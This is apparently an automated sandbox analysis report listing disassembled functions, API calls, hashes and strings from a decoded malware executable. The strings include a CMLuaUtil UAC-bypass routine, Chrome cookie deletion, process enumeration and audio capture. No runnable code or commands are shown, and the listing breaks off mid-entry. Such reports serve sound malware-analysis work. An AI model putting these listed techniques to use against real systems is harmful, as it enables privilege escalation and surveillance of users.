                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16
                                                          • String ID: a/p$am/pm$hD
                                                          • API String ID: 3509577899-3668228793
                                                          • Opcode ID: 44ea5ac924aea223c25ec6af7a156dea15db996b08b3c9c3fe5b3e61d2d79652
                                                          • Instruction ID: deb853d5fd6adf3918d69246e21912660bd894b39407ab32d9d7da7685977c7a
                                                          • Opcode Fuzzy Hash: 44ea5ac924aea223c25ec6af7a156dea15db996b08b3c9c3fe5b3e61d2d79652
                                                          • Instruction Fuzzy Hash: 1CD111719002069AFB289F68C9857BBB7B0FF06708F26415BE9019B355D33D9D81CB6B
                                                          Function 0044FA16 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 1d80ecd898b2873860388bfd90a69a91c38572b88f559cfcb1da031a1a01905e
                                                          • Instruction ID: 0b2e84c71dbf843dbcc2e99f9f8dbab27ea7d8a4e4ef3fbdb467abc62f582456
                                                          • Opcode Fuzzy Hash: 1d80ecd898b2873860388bfd90a69a91c38572b88f559cfcb1da031a1a01905e
                                                          • Instruction Fuzzy Hash: E061E271D00244AFEB20DF69C842BAABBF4EB4A320F24407BED45EB251D734AD45DB58
                                                          Function 0044418B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • _free.LIBCMT ref: 00444296
                                                          • _free.LIBCMT ref: 004442AD
                                                          • _free.LIBCMT ref: 004442CC
                                                          • _free.LIBCMT ref: 004442E7
                                                          • _free.LIBCMT ref: 004442FE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID: Z9D
                                                          • API String ID: 3033488037-3781130823
                                                          • Opcode ID: 1e396c4f324de9ddb7b01a7129941a49517c4d4e7f7401902ff7e7d19c1db4b4
                                                          • Instruction ID: 86c8eacfe83d9672290f1135950403671a27bde0e5aa55c461cabd1b4ee88ac5
                                                          • Opcode Fuzzy Hash: 1e396c4f324de9ddb7b01a7129941a49517c4d4e7f7401902ff7e7d19c1db4b4
                                                          • Instruction Fuzzy Hash: D551B171A00304AFEB20DF6AC881B6A77F4FF95724B1446AEF809D7650E779DA01CB48
                                                          Function 0044A2D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044AA48,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A315
                                                          • __fassign.LIBCMT ref: 0044A390
                                                          • __fassign.LIBCMT ref: 0044A3AB
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A3D1
                                                          • WriteFile.KERNEL32(?,00000000,00000000,0044AA48,00000000,?,?,?,?,?,?,?,?,?,0044AA48,?), ref: 0044A3F0
                                                          • WriteFile.KERNEL32(?,?,00000001,0044AA48,00000000,?,?,?,?,?,?,?,?,?,0044AA48,?), ref: 0044A429
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: 19793b4b6baa09b5fac30a83039e1f9c1b1fc09f5707b87a30c95e6118fc2717
                                                          • Instruction ID: 781c03a50f1c813746d4e14bf3c61566c92396d5579059589c4d950ed669b936
                                                          • Opcode Fuzzy Hash: 19793b4b6baa09b5fac30a83039e1f9c1b1fc09f5707b87a30c95e6118fc2717
                                                          • Instruction Fuzzy Hash: 6551C474E002499FDB10CFA8D845AEEBBF4EF09300F14412BE955E7291E774A951CB6A
                                                          Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExitThread.KERNEL32 ref: 004017F4
                                                            • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                            • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401902
                                                            • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                          • __Init_thread_footer.LIBCMT ref: 004017BC
                                                            • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                            • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                          • String ID: XMG$NG$NG
                                                          • API String ID: 1596592924-1283814050
                                                          • Opcode ID: 9c93778598743552ca7cf549f7c264060170741c6fea158e9adbc4e2dfda7b39
                                                          • Instruction ID: a5e0bc9ac4bbc073a85812dd1d3adb1d2a3c84d0b98f0a89840e4e641ba94373
                                                          • Opcode Fuzzy Hash: 9c93778598743552ca7cf549f7c264060170741c6fea158e9adbc4e2dfda7b39
                                                          • Instruction Fuzzy Hash: 5341B4712042008BC329FB65DD96AAE7395EB94318F10453FF54AA31F2DF389986CB5E
                                                          Function 0040E77B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                            • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E799
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040E7BD
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E7CC
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E983
                                                            • Part of subcall function 0041B392: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E5A8,00000000,?,?,004750FC), ref: 0041B3A7
                                                            • Part of subcall function 0041B392: IsWow64Process.KERNEL32(00000000,?,?,?,004750FC), ref: 0041B3B2
                                                            • Part of subcall function 0041B588: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                            • Part of subcall function 0041B588: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E974
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                          • String ID: `wF
                                                          • API String ID: 2180151492-1213667750
                                                          • Opcode ID: 9dc562cd00f3f50bc6e2eada1fc9f3fa230e0bea5391e794d91a9c4d3f2fe10f
                                                          • Instruction ID: eccf11dc20c1a31a83cdfd33956dcb3d749eb3f266b118f2c15681f5292a9231
                                                          • Opcode Fuzzy Hash: 9dc562cd00f3f50bc6e2eada1fc9f3fa230e0bea5391e794d91a9c4d3f2fe10f
                                                          • Instruction Fuzzy Hash: F741CF311083455BC225FB61D891AEFB7E5AFA4304F50453EF849531E1EF389A49C65A
                                                          Function 00437C90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437CBB
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00437CC3
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437D51
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00437D7C
                                                          • _ValidateLocalCookies.LIBCMT ref: 00437DD1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: e20e4e91601e7da6f84b85b393d4409c90c36ea595a33a74ae9b4edf16c34eae
                                                          • Instruction ID: 1103995f59bc857a00dd0af833384e4a9f5f4a2e3f3cb1d3a3c35a3a433dd29e
                                                          • Opcode Fuzzy Hash: e20e4e91601e7da6f84b85b393d4409c90c36ea595a33a74ae9b4edf16c34eae
                                                          • Instruction Fuzzy Hash: 4E410674A042099BCF20DF29C844AAE7BA5AF4C328F14905AEC55AB392D739DD45CF98
                                                          Function 00455B13 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfbae8f3dcd2e5f3bdf3bcee8d3106cebccc1d81cd58107c476234e6777acd1f
                                                          • Instruction ID: 890753aa9dfb888b2a1585f98a5e225511b13b718af609ae416a1884f745cca0
                                                          • Opcode Fuzzy Hash: cfbae8f3dcd2e5f3bdf3bcee8d3106cebccc1d81cd58107c476234e6777acd1f
                                                          • Instruction Fuzzy Hash: 3A112472504A15BFDB206F729C08D3B3AACEB82736F20016EFC15D7282DE38C800C669
                                                          Function 0040FCC7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FCD4
                                                          • int.LIBCPMT ref: 0040FCE7
                                                            • Part of subcall function 0040CFB3: std::_Lockit::_Lockit.LIBCPMT ref: 0040CFC4
                                                            • Part of subcall function 0040CFB3: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CFDE
                                                          • std::_Facet_Register.LIBCPMT ref: 0040FD23
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FD49
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FD65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: xkG
                                                          • API String ID: 2536120697-3406988965
                                                          • Opcode ID: 4b6f72b1e0d08092fd2688f9826419a51511b3482868562e895aff95ac9ad519
                                                          • Instruction ID: 7cf641d0f45d7e480cf6c67891cb53e845b1d2cd586d61112ae60f6436568b55
                                                          • Opcode Fuzzy Hash: 4b6f72b1e0d08092fd2688f9826419a51511b3482868562e895aff95ac9ad519
                                                          • Instruction Fuzzy Hash: 3B11F032900119A7CB14FBA5D8429DEB7689E55358F10013BF809B72D1EB3CAF49C7D9
                                                          Function 0044FEEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0044FC32: _free.LIBCMT ref: 0044FC5B
                                                          • _free.LIBCMT ref: 0044FF39
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 0044FF44
                                                          • _free.LIBCMT ref: 0044FF4F
                                                          • _free.LIBCMT ref: 0044FFA3
                                                          • _free.LIBCMT ref: 0044FFAE
                                                          • _free.LIBCMT ref: 0044FFB9
                                                          • _free.LIBCMT ref: 0044FFC4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                          • Instruction ID: 7d3bb130547cbd64d3bc6acdbb054c191a8682768e3bc5df2cfa43195c7f437f
                                                          • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                          • Instruction Fuzzy Hash: 3611603158175CAAE930B7B2CC87FCB779CFF01744F804C2EB69B66052DA2CB90A5655
                                                          Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe), ref: 00406835
                                                            • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                            • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004669B0,00000000), ref: 004067E9
                                                          • CoUninitialize.OLE32 ref: 0040688E
                                                          Strings
                                                          • [+] before ShellExec, xrefs: 00406856
                                                          • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                                                          • C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, xrefs: 00406815, 00406818, 0040686A
                                                          • [+] ShellExec success, xrefs: 00406873
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-3044081716
                                                          • Opcode ID: f62f8ea22737c4132ff5b3dac93a03cf3a5d885852b0606909ed978fbfad8032
                                                          • Instruction ID: bf5204b976fdd256b066cceb308157ad377b3c08e3874fea13dbf5f4dff6080c
                                                          • Opcode Fuzzy Hash: f62f8ea22737c4132ff5b3dac93a03cf3a5d885852b0606909ed978fbfad8032
                                                          • Instruction Fuzzy Hash: F20180722023117FE2287B21DC0EF7B6658DB4176AF12413FF946A71C1EAA9AC014679
                                                          Function 0040FFAA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040FFB7
                                                          • int.LIBCPMT ref: 0040FFCA
                                                            • Part of subcall function 0040CFB3: std::_Lockit::_Lockit.LIBCPMT ref: 0040CFC4
                                                            • Part of subcall function 0040CFB3: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CFDE
                                                          • std::_Facet_Register.LIBCPMT ref: 00410006
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0041002C
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410048
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: pmG
                                                          • API String ID: 2536120697-2472243355
                                                          • Opcode ID: 49ddf8ddb094ef95c775291761389dec69e80ba720e56a3ba1433f00512a79dc
                                                          • Instruction ID: 7757f8b08a06b45aa46d7f93aac2e311949306114fe400d1b3bff67def6a62fd
                                                          • Opcode Fuzzy Hash: 49ddf8ddb094ef95c775291761389dec69e80ba720e56a3ba1433f00512a79dc
                                                          • Instruction Fuzzy Hash: D911B231900419EBCB14FBA5D9429DD7B689E58358F10016FF40567191EB78AF86C789
                                                          Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                          • GetLastError.KERNEL32 ref: 0040B2EE
                                                          Strings
                                                          • UserProfile, xrefs: 0040B2B4
                                                          • [Chrome Cookies not found], xrefs: 0040B308
                                                          • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          • Opcode ID: cf451260b0bd619138d89529fe6e6a099da6595cca3d19e9fe3cb5fbfd9057d6
                                                          • Instruction ID: 9d7a183bab8cffc7e176200adf3036985cfece21d6991fc3b8afe8d0fe8b9813
                                                          • Opcode Fuzzy Hash: cf451260b0bd619138d89529fe6e6a099da6595cca3d19e9fe3cb5fbfd9057d6
                                                          • Instruction Fuzzy Hash: AB01623565010557CB0477B6DD6B9AF3628ED51718B60013FF802771E2FE3A990586DE
                                                          Function 0043980C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __allrem.LIBCMT ref: 00439999
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004399B5
                                                          • __allrem.LIBCMT ref: 004399CC
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004399EA
                                                          • __allrem.LIBCMT ref: 00439A01
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00439A1F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
